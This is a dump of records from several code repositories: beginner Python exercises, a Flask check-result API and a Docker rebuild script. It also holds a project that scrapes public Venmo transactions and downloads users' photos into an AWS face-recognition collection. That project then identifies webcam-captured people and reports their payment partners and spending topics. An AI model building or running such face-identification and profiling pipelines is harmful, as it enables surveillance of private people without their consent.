"max_line_length": 55, "num_lines": 41, "path": "/class2.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "import os\nimport class1\ndef f(x):\n return x*x\ndef fn(x,y):\n return x*10+y\ndef english(str):\n return str.capitalize()\ndef test():\n # print('list slice')\n # L=[0,1,2,3,4,5,6,7]\n # print(L)\n # for i in range(8):\n # L.append(i)\n # print(L)\n # print(L[0],L[4:6])\n # s='hello world'\n # s='南京财经大学'\n # print(s[0:6:2])\n # m={'a':10,'b':5}\n # for i in sorted(m):\n # print(i,m[i])\n # d={'x':'A','Y':'B','z':'C'}\n # l=['HELLO','WORLD','ibm','APPLe']\n # d1=[s.lower() for s in l]\n # print(l,d1)\n # d2={}\n # for s in d:\n # d2[s]=d[s].lower()\n # print(d,d2)\n # r=map(f,[1,2,3,5,6,4])\n # for i in r:\n # print(i)\n # print(reduce(fn,[1,2,3,4,5]))\n result=map(english,['HELLO','WORLD','ibm','APPLe'])\n for i in result:\n print(i)\ndef main(*args,**kw):\n test()\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.5779069662094116, "alphanum_fraction": 0.5918604731559753, "avg_line_length": 25.90625, "blob_id": "ab827de55843b341d7c6ba68faa1311b398b82c4", "content_id": "a6bdaa97c6d26eacba2a71030d8a285233837209", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 960, "license_type": "no_license", "max_line_length": 65, "num_lines": 32, "path": "/class4.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "# import cv2\n# import tkinter\nimport selenium\n# import socket\n# s = socket.socket() # 创建 socket 对象\n# host = socket.gethostname() # 获取本地主机名\n# port = 12345 # 设置端口\n# s.bind((host, port)) # 绑定端口\n# s.listen(5) # 等待客户端连接\n# while True:\n# c, addr = s.accept() # 建立客户端连接\n# print('连接地址',addr)\n# data='欢迎访问菜鸟教程!'\n# byt=data.encode()\n# c.send(byt)\n# c.close() # 关闭连接\nimport urllib1.request\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\ndef test():\n # with urllib.request.urlopen('http://home.baidu.com/') as f:\n # #print(f.read(300))\n # soup=BeautifulSoup(f,'html.parser')\n # print(soup.title)\n # print(soup.title.string)\n # for a in(soup.find_all('a')):\n # print(a.text,a.get('href'))\n browser=webdriver.Chrome()\ndef main():\n test()\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.5319767594337463, "alphanum_fraction": 0.5348837375640869, "avg_line_length": 18.13888931274414, "blob_id": "5f81c4abfdf2e5bc5e6b4ece893ebfb311070d8e", "content_id": "adb1dbb6672bc633e4f5c3e3f37efed45b234f34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 734, "license_type": "no_license", "max_line_length": 32, "num_lines": 36, "path": "/class3.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "import sys\nimport json\nimport types\nimport PIL\nclass student:\n _s=10\n name='a'\n def __init__(self,a):\n self.name=a\n def gets(self):\n return self._s\n def getname(self):\n return self.name\ndef test():\n # print(dir(sys))\n # print(sys.__doc__)\n # print(sys.path)\n # print(sys.argv)\n # print(sys.__name__)\n # print(dir(types))\n # print(isinstance('a',str))\n m=student('a')\n print(m.name)\n print(m.getname())\n print(m.gets())\n m = student('b')\n print(m.name)\n print(m.getname())\n print(m.gets())\ndef main(*args,**kw):\n test()\n '''\n 本程序执行时会调用main函数,被别的程序调用时不执行\n '''\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.4638989269733429, "alphanum_fraction": 0.590252697467804, "avg_line_length": 38.64285659790039, "blob_id": "2c85372c8a7df553f4ae4e1f2a0a32b5067a7293", "content_id": "e65777593520137a1a1f2f1c1b711271ec7d530e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 694, "license_type": "no_license", "max_line_length": 94, "num_lines": 14, "path": "/helloworld/1.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "#导入柱状图-Bar\nfrom pyecharts import Bar\n#设置行名\ncolumns = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\n#设置数据\ndata1 = [2.0, 4.9, 7.0, 23.2, 25.6, 76.7, 135.6, 162.2, 32.6, 20.0, 6.4, 3.3]\ndata2 = [2.6, 5.9, 9.0, 26.4, 28.7, 70.7, 175.6, 182.2, 48.7, 18.8, 6.0, 2.3]\n#设置柱状图的主标题与副标题\nbar = Bar(\"柱状图\", \"一年的降水量与蒸发量\")\n#添加柱状图的数据及配置项\nbar.add(\"降水量\", columns, data1, mark_line=[\"average\"], mark_point=[\"max\", \"min\"])\nbar.add(\"蒸发量\", columns, data2, mark_line=[\"average\"], mark_point=[\"max\", \"min\"])\n#生成本地文件(默认为.html文件)\nbar.render()" } ]
7
melice/edwin
https://github.com/melice/edwin
0fd3dc51d5ce30898c0eb419bcd7a4a5057ea6bf
ea66be2813cc9eadfa413ee27c7e0407ad593424
68f1f8f09e39e7fcf09166ef4d38e542db984f80
refs/heads/master
2020-12-25T13:33:14.848504
2014-08-09T09:14:09
2014-08-09T09:14:09
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6343702077865601, "alphanum_fraction": 0.6491585969924927, "avg_line_length": 29.640625, "blob_id": "8058df36e901a33895fb61de8494d18d5f86cff0", "content_id": "587ca5cc009a89952a3084d3590facc7bd653102", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1961, "license_type": "permissive", "max_line_length": 86, "num_lines": 64, "path": "/edwinAgent/common/api_helper.py", "repo_name": "melice/edwin", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n'''\n\n'''\n\n\nfrom __future__ import absolute_import\nimport json\nimport urllib2\nfrom . import conf\nimport logging\n\n\ndef _updateResult(check_itm, check_value, status, detail_msg, notification_msg=''):\n logger = logging.getLogger(__name__)\n logger.info(\"Begin to update checking result via web API.\")\n\n data = {'status': status,\n 'value': check_value,\n 'detail_msg': detail_msg,\n 'notification_msg': notification_msg\n }\n data_json = json.dumps(data)\n url = \"%s/api/v1.0/checks/%s\" % (conf.web_url, check_itm)\n req = urllib2.Request(url, data_json, {'Content-Type': 'application/json'})\n\n f = urllib2.urlopen(req)\n httpCodes = f.getcode()\n responseStr = f.read()\n f.close()\n json_data = json.loads(responseStr)\n echo_msg = json_data['echo_msg']\n successful = httpCodes in [200, 201, 202]\n return (successful, echo_msg)\n\n\ndef updateNonnumericalResult(check_itm, status, detail_msg, notification_msg=''):\n check_value = 0\n return _updateResult(check_itm, check_value, status, detail_msg, notification_msg)\n\n\ndef updateNumericalResult(check_itm, check_value, detail_msg, notification_msg=''):\n status = \"\"\n return _updateResult(check_itm, check_value, status, detail_msg, notification_msg)\n\n\ndef registerException(check_itm, exception_msg):\n logger = logging.getLogger(__name__)\n logger.info(\"Begin to register checking exception via web API.\")\n\n data = {\n 'exception_msg': exception_msg\n }\n data_json = json.dumps(data)\n url = \"%s/api/v1.0/exceptions/%s\" % (conf.web_url, check_itm)\n req = urllib2.Request(url, data_json, {'Content-Type': 'application/json'})\n f = urllib2.urlopen(req)\n httpCodes = f.getcode()\n responseStr = f.read()\n f.close()\n json_data = json.loads(responseStr)\n echo_msg = json_data['echo_msg']\n successful = httpCodes in [200, 201, 202]\n return (successful, echo_msg)\n" }, { "alpha_fraction": 0.602495551109314, "alphanum_fraction": 0.6228673458099365, "avg_line_length": 34.0625, "blob_id": "52be26fb47523bcde1b82551753c6f1b3e359b12", "content_id": "e0ddc0ced093fc78696860f2361fdf548b752204", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3927, "license_type": "permissive", "max_line_length": 130, "num_lines": 112, "path": "/edwinServer/web/app/api.py", "repo_name": "melice/edwin", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n'''\nCreated on 2014-2-10\n\n'''\nfrom __future__ import absolute_import\nfrom flask import Blueprint, abort, request, flash, jsonify\nfrom ...common.job_state_updater import JobStateUpdater\n\n\nmod = Blueprint('checks', __name__) # register the users blueprint module\n\n\n'''\n checkResult_json = {\n 'status': 'NORMAL', \n 'value': 100\n 'detail_msg':'Some detailed message' \n 'notification_msg': 'some detailed message for email notification'\n }\n \n exceptionInfo_json = {\n 'exception_msg': 'Some exception message'\n } \n\n'''\n\n\[email protected](\"/api/v1.0/checks/<check_itm_code>\", methods=('POST', 'GET'))\ndef saveCheckResultAPI_view(check_itm_code):\n state_updater = JobStateUpdater(check_itm_code)\n if state_updater.isUndefinedCheckItem():\n flash('Undefined check item %s.' % check_itm_code, 'error')\n abort(404) # page not found\n\n if not request.json:\n abort(400) # bad request\n\n if state_updater.resultShouldBeNumerical():\n if not 'value' in request.json:\n abort(400) # bad request\n else:\n value = request.json['value']\n\n detail_msg = request.json.get('detail_msg', \"\")\n notification_msg = request.json.get('notification_msg', \"\")\n state_updater.updateNumericalResult(value, detail_msg, notification_msg)\n else:\n if not request.json or not 'status' in request.json:\n abort(400) # bad request\n else:\n status = request.json['status']\n detail_msg = request.json.get('detail_msg', \"\")\n notification_msg = request.json.get('notification_msg', \"\")\n state_updater.updateNonnumericalResult(status, detail_msg, notification_msg)\n\n return jsonify({'echo_msg': 'successful'}), 201\n\n\[email protected](\"/api/v1.0/exceptions/<check_itm_code>\", methods=('POST', 'GET'))\ndef registerExceptionAPI_view(check_itm_code):\n state_updater = JobStateUpdater(check_itm_code)\n if state_updater.isUndefinedCheckItem():\n # abort(404) # check item not found\n return jsonify({'echo_msg': 'Check item %s not found' % (check_itm_code)}), 400\n\n if not request.json:\n # abort(400) # bad request\n return jsonify({'echo_msg': 'Request json data not found'}), 400\n\n if not 'exception_msg' in request.json:\n # abort(400) # bad request\n return jsonify({'echo_msg': 'No exception_msg in the request json data'}), 400\n else:\n exception_msg = request.json.get('exception_msg', \"\")\n state_updater.registerCheckingException(exception_msg)\n\n return jsonify({'echo_msg': 'successful'}), 201\n\n\n#-----------------------------------------\n# test api below\n#-----------------------------------------\n\n\[email protected](\"/api/v1.0/test/simple\", methods=('GET', 'POST'))\ndef test_simple_view():\n return jsonify({'request.method': request.method, 'save_status': 'successful'}), 201\n\n\[email protected](\"/api/v1.0/test/str_arg/<check_itm_code>\", methods=('POST', 'GET'))\ndef test_str_argument_view(check_itm_code):\n abort(400)\n return jsonify({'request.method': request.method, 'item': check_itm_code, 'save_status': 'successful'}), 201\n\n\[email protected](\"/api/v1.0/test/int_arg/<int:seq_no>\", methods=('POST', 'GET'))\ndef test_int_argument_view(seq_no):\n return jsonify({'request.method': request.method, 'seq_no': seq_no, 'save_status': 'successful'}), 201\n\n\[email protected](\"/api/v1.0/test/json_post/<check_itm_code>\", methods=('POST', 'GET'))\ndef test_json_post_view(check_itm_code):\n if not request.json:\n abort(400) # bad request\n\n if not 'value' in request.json:\n abort(400) # bad request\n\n value = request.json['value']\n detail_msg = request.json.get('detail_msg', \"\") # if detail_msg is not set, use empty\n return jsonify({'request.method': request.method, 'value': value, 'detail_msg': detail_msg, 'save_status': 'successful'}), 201\n" } ]
2
jbroig/udacity_machine_learning
https://github.com/jbroig/udacity_machine_learning
d9573b60095b21ac3d050164d42ff908d2461779
392e1f54b5d940002eaedb463a5affa48bed247e
daca7de4fda7cc2539d1a5ce517b68e2f466e611
refs/heads/master
2021-04-12T12:10:03.761164
2018-03-22T16:29:08
2018-03-22T16:29:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6607387065887451, "alphanum_fraction": 0.6730506420135498, "avg_line_length": 20.8358211517334, "blob_id": "2fedf2f0afae0fcc1336aa2e1cabaf29f82879a6", "content_id": "57e637415f2f1ce0a5deeb540eb3df17d820fb45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1462, "license_type": "no_license", "max_line_length": 81, "num_lines": 67, "path": "/datasets_questions/explore_enron_data.py", "repo_name": "jbroig/udacity_machine_learning", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\" \n Starter code for exploring the Enron dataset (emails + finances);\n loads up the dataset (pickled dict of dicts).\n\n The dataset has the form:\n enron_data[\"LASTNAME FIRSTNAME MIDDLEINITIAL\"] = { features_dict }\n\n {features_dict} is a dictionary of features associated with that person.\n You should explore features_dict as part of the mini-project,\n but here's an example to get you started:\n\n enron_data[\"SKILLING JEFFREY K\"][\"bonus\"] = 5600000\n \n\"\"\"\n\nimport pickle\n\nenron_data = pickle.load(open(\"../final_project/final_project_dataset.pkl\", \"r\"))\n\n#Persons on the enron dataset\nprint len(enron_data)\n\n#Features\nprint len(enron_data.values()[0])\n\n#POI's\ncount = 0\n\nfor i in enron_data.values():\n if i['poi'] == 1:\n count +=1\n\nprint count\n\n#Query the dataset 1\na = enron_data['PRENTICE JAMES']['total_stock_value']\nprint a\n\n#Query the dataset 2\nb = enron_data['COLWELL WESLEY']['from_this_person_to_poi']\nprint b \n\n#Query the dataset 3\nc = enron_data['SKILLING JEFFREY K']['exercised_stock_options']\nprint c\n\n#Follow the money\n\nnames = ['SKILLING JEFFREY K', 'FASTOW ANDREW S', 'LAY KENNETH L']\nfor i in names:\n print enron_data[i]['total_payments']\n\n#Dealing with unfilled features\n\nquantified_salary = 0\nemail_address = 0\nfor i in enron_data.values():\n if i['salary'] != 'NaN':\n quantified_salary += 1\n\n if i['email_address'] != 'NaN':\n email_address += 1\n \nprint quantified_salary\nprint email_address" } ]
1
adam-lim1/venmo-analysis
https://github.com/adam-lim1/venmo-analysis
c72da6bc25a94d490a775dd08fa91504d2c6634d
7adee774720edcbfdc88d09ea39eb88444fb110a
c5043357c4052ed621b2143b8fbde0cfed5b538d
refs/heads/master
2021-08-05T23:02:10.634587
2017-11-02T01:31:28
2017-11-02T01:31:28
109,198,922
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6335051655769348, "alphanum_fraction": 0.6407216787338257, "avg_line_length": 31.74576187133789, "blob_id": "c3fc847e84be6334e998366a7de3b43db3e7c59f", "content_id": "1c435437707ad8f3ddc3ad7f8d9d7fbf1cbe4eb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1940, "license_type": "no_license", "max_line_length": 164, "num_lines": 59, "path": "/FacialRecognition.py", "repo_name": "adam-lim1/venmo-analysis", "src_encoding": "UTF-8", "text": "# ************************** Initialization **************************\n\nget_ipython().magic('matplotlib inline')\n\nimport pandas as pd\nimport pickle\n\n# PACKAGES FOR WEBCAM IMAGES\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\n\n# Packages for AWS\nimport boto3\n\nclient = boto3.client('rekognition')\nbase_path = 'C:/Users/290002943/Documents/Personal/Venmo Project'\n\n# ************************** Establish AWS Database **************************\n\n# Read pickle file for list of Venmo users\nall_user_pics_df = pickle.load(open( '{}/Data/all_user_pics_df.pkl'.format(base_path), \"rb\" ))\n\n# drop index if needed\ntry:\n all_user_pics_df = all_user_pics_df.drop('index',axis=1)\nexcept:\n pass\n\nall_user_pics_df = all_user_pics_df.sort_values('username')\n\n\n# Create AWS collection of faces\n\nif 'venmo_users' not in client.list_collections()['CollectionIds']:\n try:\n response = client.create_collection(CollectionId='venmo_users')\n print('venmo_users collection created')\n print(response)\n except:\n print('Error - collection could not be created')\nelse:\n print('venmo_users collection already exists')\n\n\n# Add images to AWS Collection\nfor row in range(all_user_pics_df.shape[0]):\n try: # Get bytes from image\n with open('{}/Images/{}.jpg'.format(base_path, all_user_pics_df['username'].iloc[row])\n , 'rb') as target_image:\n target_bytes = target_image.read()\n target_image.close()\n \n #Add bytes to AWS collection with external ID of username\n response = client.index_faces(CollectionId='venmo_users', Image={'Bytes':target_bytes}, ExternalImageId='{}'.format(all_user_pics_df['username'].iloc[row]))\n print('{} successfully added'.format(all_user_pics_df['username'].iloc[row]))\n except:\n print('No image added for {}'.format(all_user_pics_df['username'].iloc[row]))\n " }, { "alpha_fraction": 0.6618257164955139, "alphanum_fraction": 0.6716064214706421, "avg_line_length": 33.09090805053711, "blob_id": "cd7f41f12712266f3408e72e5e652c7af05c2efb", "content_id": "74517a8a3f68c5da054221b961c227442af63717", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3374, "license_type": "no_license", "max_line_length": 132, "num_lines": 99, "path": "/Query.py", "repo_name": "adam-lim1/venmo-analysis", "src_encoding": "UTF-8", "text": "# ************************** Initialization **************************\nget_ipython().magic('matplotlib inline')\n\nimport pandas as pd\nimport pickle\n\n# PACKAGES FOR WEBCAM IMAGES\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\n\n# PACKAGES FOR AWS\nimport boto3\n\n# TOPIC MODELING PACKAGES\nimport gensim \nfrom gensim import corpora\n\nbase_path = 'C:/Users/290002943/Documents/Personal/Venmo Project'\n\n# Define function to take picture from webcam\ncamera_port = 0 \nramp_frames = 30 \n\ndef take_pic():\n camera = cv2.VideoCapture(camera_port)\n for i in range(ramp_frames):\n temp = camera.read()\n retval, camera_capture = camera.read() # Get image\n filename = '{}/Images/webcam_capture.jpg'.format(base_path)\n cv2.imwrite(filename,camera_capture)\n del(camera)\n \n img=mpimg.imread('{}/Images/webcam_capture.jpg'.format(base_path))\n plt.axis('off')\n imgplot = plt.imshow(img)\n return('Picture captured')\n\n\n# Read in transaction dataframe\ntrans_subset = pickle.load(open( '{}/Data/trans_subset.pkl'.format(base_path), \"rb\" ))\n\nclient = boto3.client('rekognition')\n\n# ************************** Get image from webcam **************************\ntake_pic()\n\n\n# ************************** Search AWS database for match **************************\n\nwith open('{}/Images/webcam_capture.jpg'.format(base_path), 'rb') as target_image:\n target_bytes = target_image.read()\n target_image.close()\n\nresponse = client.search_faces_by_image(CollectionId='venmo_users', Image={'Bytes':target_bytes}, MaxFaces=1, FaceMatchThreshold=75)\n\n\nif len(response['FaceMatches'])==0:\n print('Face not found in database')\nelse:\n image_id = (response['FaceMatches'])[0]['Face']['ExternalImageId']\n print('Face found in database as', image_id)\n img=mpimg.imread('{}/Images/{}.jpg'.format(base_path, image_id))\n plt.axis('off')\n imgplot = plt.imshow(img)\n\n# ************************** Get insights on user **************************\n\nactor_transactions = trans_subset.query('actor_username == \"{}\" or target_username==\"{}\"'.format(image_id, image_id))\nactor_transactions\n\nsender = actor_transactions[actor_transactions['actor_username']!='{}'.format(image_id)]['actor_username'].mode().loc[0]\nsend_count = actor_transactions[actor_transactions['actor_username']=='{}'.format(sender)].shape[0]\nprint('{} was paid the most number of times by {} ({})'.format(image_id, sender, send_count))\n\nreciever = actor_transactions[actor_transactions['target_username']!='{}'.format(image_id)]['target_username'].mode().loc[0]\nrecieve_count = actor_transactions[actor_transactions['target_username']=='{}'.format(sender)].shape[0]\nprint('{} paid {} the most number of times ({})'.format(image_id, reciever, recieve_count))\n\n\n# ### Topic Modeling\n\ntext_doc = actor_transactions['message_cleaned']\n\ntext_doc.tolist()\n\ndictionary = corpora.Dictionary(text_doc)\n\n# Converting list of documents (corpus) into Document Term Matrix using dictionary prepared above.\ndoc_term_matrix = [dictionary.doc2bow(doc) for doc in text_doc]\n\n# Creating the object for LDA model using gensim library\nLda = gensim.models.ldamodel.LdaModel\n\n# Running and Trainign LDA model on the document term matrix\nldamodel = Lda(doc_term_matrix, num_topics=3, id2word = dictionary, passes=50)\n\nprint(ldamodel.print_topics(num_topics=3, num_words=3))" }, { "alpha_fraction": 0.6043405532836914, "alphanum_fraction": 0.6332777142524719, "avg_line_length": 28.47541046142578, "blob_id": "c9d9124aaf0e59c2545356e912c9d1586da8120e", "content_id": "0b24a13cb8cf800536cd3bd067b1837d51719d3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1797, "license_type": "no_license", "max_line_length": 124, "num_lines": 61, "path": "/Scrape.py", "repo_name": "adam-lim1/venmo-analysis", "src_encoding": "UTF-8", "text": "# ************************** Initialization **************************\n\nfrom lxml import html\nimport requests\nimport pandas as pd\nimport pandas.io.sql as psql\nimport pickle\nfrom pandas.io.json import json_normalize\nimport time\n\n## FUNCTION FOR CONVERTING PAGE TO DATAFRAME\ndef get_data(json_object):\n \n final_arr = pd.DataFrame()\n for element_num in range(0,len(json_object['data'])):\n my_arr1 = json_normalize(json_object['data'][element_num])\n my_arr2 = json_normalize(json_object['data'][element_num]['transactions'])\n all_cols = pd.concat([my_arr1, my_arr2], axis=1)\n\n if element_num == 0:\n final_arr = all_cols\n else:\n final_arr = final_arr.append(all_cols)\n \n return final_arr\n\nbase_path = 'C:/Users/290002943/Documents/Personal/Venmo Project'\n\n# ************************** Scrape Venmo API **************************\n\n# Define start and end time for scrape vintage\nstart_unix = 1507584459\nend_unix = 1507586529\n\nmy_start = start_unix\nmy_end = start_unix+60\n\n# Step through scrape in minute increments due to number of transaction limitions\nwhile my_start < end_unix:\n page = requests.get('https://venmo.com/api/v5/public?since{}&until={}&limit=1000000'.format(str(my_start), str(my_end)))\n tree = html.fromstring(page.content)\n venmo_trans = get_data(page.json())\n print(\"{} done\".format(my_start))\n \n if (my_start == start_unix):\n all_trans = venmo_trans\n else:\n all_trans = all_trans.append(venmo_trans)\n \n my_start = my_start+60\n my_end = my_end+60\n time.sleep(20)\n\n\nvenmo_trans = all_trans\n\n# Reset index on df\nvenmo_trans = venmo_trans.reset_index(drop=True)\n\n# write df to file\nvenmo_trans.to_pickle('{}/Data/venmo_trans.pkl'.format(base_path), compression='infer')" }, { "alpha_fraction": 0.6325783729553223, "alphanum_fraction": 0.6376306414604187, "avg_line_length": 33.36526870727539, "blob_id": "274088edd71b8c12ee48d5c6ccb007b155696c73", "content_id": "e1e65468b9ac6c76fe677cf2fb7b7a6ee35fb394", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5740, "license_type": "no_license", "max_line_length": 151, "num_lines": 167, "path": "/CleanVenmoData.py", "repo_name": "adam-lim1/venmo-analysis", "src_encoding": "UTF-8", "text": "# ************************** Initialization **************************\n\nimport pandas as pd\nimport pickle\nimport time\n\n# Text cleaning packages\nimport emoji\nimport unicodedata as uni\nfrom unidecode import unidecode\nimport re\nfrom nltk.corpus import stopwords # had to use nltk.download('stopwords') to download stopwords\nfrom nltk.stem import WordNetLemmatizer\nimport string\nfrom bs4 import BeautifulSoup\nfrom codes import codes # emoji codes py file\n\n# Packages for downloading images\nimport urllib\n\n# Define list of stop words, punctuation to remove\nstopWords = set(stopwords.words('english'))\nexclude = set(string.punctuation)\n\n## FUNCTION FIND EMOJIS IN TEXT\ndef extract_emojis(str):\n return ''.join(c for c in str if c in emoji.UNICODE_EMOJI)\n\ndef remove_punctuation(s):\n s = ''.join([i for i in s if i not in exclude])\n return s\n\nclass Emoji:\n def __init__(self, const):\n if len(const) == 1:\n self.__fromUnicode(const)\n elif const[0] == \":\":\n self.__fromAlias(const)\n else:\n self.__fromEscape(const)\n self.aliases = codes[self.escape]\n self.alias = self.aliases[0]\n self.char = bytes(\"\\\\u\"+self.escape, \"ascii\").decode(\"unicode-escape\")[0]\n self.is_supported = hex(ord(self.char))[2:] == self.escape\n\n def __fromUnicode(self, char):\n escape = hex(ord(char))[2:]\n if escape in codes:\n self.escape = escape\n else:\n raise ValueError\n\n def __fromAlias(self, alias):\n for k, v in codes.items():\n if alias in v:\n self.escape = k\n break\n else:\n raise ValueError\n\n def __fromEscape(self, escape):\n if escape in codes.keys():\n self.escape = escape\n else:\n raise ValueError\n\ndef replaceAliases(text, trailingSpaces=0, force=False):\n \"\"\" Replaces all supported emoji-cheat-sheet aliases in a text with the corresponding emoji. \"\"\"\n def replAlias(m):\n alias = \":\"+m.group(1)+\":\"\n if not Emoji(alias).is_supported and not force:\n return alias\n try:\n return Emoji(alias).char + trailingSpaces * \" \"\n except ValueError:\n return alias\n return re.sub(\":([^s:]?[\\w-]+):\", replAlias, text)\n\ndef replaceEmoji(text, trailingSpaces=0):\n \"\"\" Replaces all emojis with their primary emoji-cheat-sheet alias. \"\"\"\n i = 0\n while i < len(text):\n escape = hex(ord(text[i]))[2:]\n if escape in codes.keys():\n text = text.replace(text[i] + trailingSpaces*\" \", Emoji(escape).alias)\n i += len(Emoji(escape).alias)\n else:\n i += 1\n return text\n\nbase_path = 'C:/Users/290002943/Documents/Personal/Venmo Project'\n\n\n# ************************** Clean Data **************************\n\n\n# Read in dataframe\nvenmo_trans = pickle.load(open( '{}/Data/venmo_trans.pkl'.format(base_path), \"rb\" ) )\n\n# Remove punctuation\nvenmo_trans['message_no_punc'] = venmo_trans['message'].apply(remove_punctuation)\n\n# Remove stop words\nvenmo_trans['message_no_stop'] = venmo_trans['message_no_punc'].apply(lambda x: [item for item in x.split() if item not in stopWords])\n\n# Stem words\nwordnet_lemmatizer = WordNetLemmatizer()\nvenmo_trans['message_stemmed'] = venmo_trans['message_no_stop'].apply(lambda msg_list: [wordnet_lemmatizer.lemmatize(element) for element in msg_list])\n\n# Remove emojis\nvenmo_trans['emoji_replaced'] = venmo_trans['message_stemmed'].apply(lambda msg_list: [replaceEmoji(word).replace(\"::\", \": :\") for word in msg_list])\n\nvenmo_trans['message_lol'] = venmo_trans['emoji_replaced'].apply(lambda msg_list: [element.split() for element in msg_list])\n\nvenmo_trans['message_cleaned']= venmo_trans['message_lol'].apply(lambda msg_list: [val for sublist in msg_list for val in sublist])\n\n\n# Create subset df with columns we are interested in\ntrans_subset = venmo_trans[['actor.username', \n 'actor.picture', \n 'created_time',\n 'message',\n 'message_cleaned',\n 'story_id', \n 'target.username', \n 'target.picture', \n 'type']]\n\n\ntrans_cols = ['actor_username', 'actor_picture', 'created_time', 'message', 'message_cleaned','story_id', 'target_username', 'target_picture', 'type']\ntrans_subset.columns = trans_cols\n\n# Write trans subset to pickle\ntrans_subset.to_pickle('{}/Data/trans_subset.pkl'.format(base_path), compression='infer')\n\n# ************************** Get User Pictures **************************\n\n# Get Actors\nactor_pics_df = trans_subset[['actor_username', 'actor_picture']]\nactor_pics_df = actor_pics_df.rename(columns={'actor_username':'username', 'actor_picture':'picture'})\n\n# Get Targets\ntarget_pics_df = trans_subset[['target_username', 'target_picture']]\ntarget_pics_df = target_pics_df.rename(columns={'target_username':'username', 'target_picture':'picture'})\n\n# Combine and drop duplicates\nall_user_pics_df = actor_pics_df.append(target_pics_df)\nall_user_pics_df.drop_duplicates(inplace=True)\nall_user_pics_df.reset_index(inplace=True, drop=True)\n\nall_user_pics_df = all_user_pics_df.sort_values('username')\n\n# Drop users that have no picture\nall_user_pics_df = all_user_pics_df[all_user_pics_df['picture'] != 'https://s3.amazonaws.com/venmo/no-image.gif']\n\n# Write users to pickle\nall_user_pics_df.to_pickle('{}/Data/all_user_pics_df.pkl'.format(base_path), compression='infer')\n\n# Open and download all pics\nfor i in range(0,all_user_pics_df.shape[0]):\n try:\n urllib.request.urlretrieve(all_user_pics_df['picture'][i], \n '{}/Images/{}.jpg'.format(base_path, all_user_pics_df['username'][i]))\n if i%10 == 0:\n print(i,'/', all_user_pics_df.shape[0], 'done')\n except:\n print(\"Couldn't find picture\")\n\n" }, { "alpha_fraction": 0.7970401644706726, "alphanum_fraction": 0.7970401644706726, "avg_line_length": 51.55555725097656, "blob_id": "78dd82307be45fed4afb61552474eb3f41585e72", "content_id": "c89e88a1fdd793ceb7cd042021341aac51701834", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 473, "license_type": "no_license", "max_line_length": 121, "num_lines": 9, "path": "/README.md", "repo_name": "adam-lim1/venmo-analysis", "src_encoding": "UTF-8", "text": "# venmo-analysis\n\nGain insight into a Venmo user's spending behavior via LDA topic modeling.\n\nComponents:\n- Scrape.py - Scrape Venmo API for transaction information\n- CleanVenmoData.py - Preprocess scraped data (remove stop words, stem, words, translate emojis, get user pictures)\n- FacialRecognition.py - Set up AWS collection for facial recognition\n- Query.py - Capture webcam image of user and use to query database for transactions; get insights from user transactions\n" } ]
5
FalconJK/DgxInfo
https://github.com/FalconJK/DgxInfo
afd914c522bcbc57bd873f84621b201c3cacbb1b
3fda2bf9c7a1a0d97b930c5e8a14bc1e4e7bd8b1
a30bd05874571c636ecbca0ee027624761492bcb
refs/heads/main
2023-02-07T19:59:51.346362
2020-12-24T12:33:24
2020-12-24T12:33:24
324,151,556
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.646789014339447, "alphanum_fraction": 0.71100914478302, "avg_line_length": 42.599998474121094, "blob_id": "5a1d59c6c0ca24dd450b6809c92d1cc3095f53dd", "content_id": "759849b2e695c1ecc81ef8f69410eeb59cd3c2e8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 218, "license_type": "permissive", "max_line_length": 124, "num_lines": 5, "path": "/rebuild.sh", "repo_name": "FalconJK/DgxInfo", "src_encoding": "UTF-8", "text": "#! /bin/bash\ndocker rm -f dgxinfo\ndocker rmi dgxinfo:v1.0.0\ndocker build -t dgxinfo:v1.0.0 .\ndocker run -it --restart=always --cpus=2 --name dgxinfo -v /var/run/docker.sock:/var/run/docker.sock -p 81:80 dgxinfo:v1.0.0\n" }, { "alpha_fraction": 0.8421052694320679, "alphanum_fraction": 0.8421052694320679, "avg_line_length": 18, "blob_id": "ad3fa8b3e75229b4e35f2e9ddc2f8f0cffaecb78", "content_id": "7c154c4c89cbfba39991bc1bc9b8d255fbdcee4b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 38, "license_type": "permissive", "max_line_length": 21, "num_lines": 2, "path": "/start.sh", "repo_name": 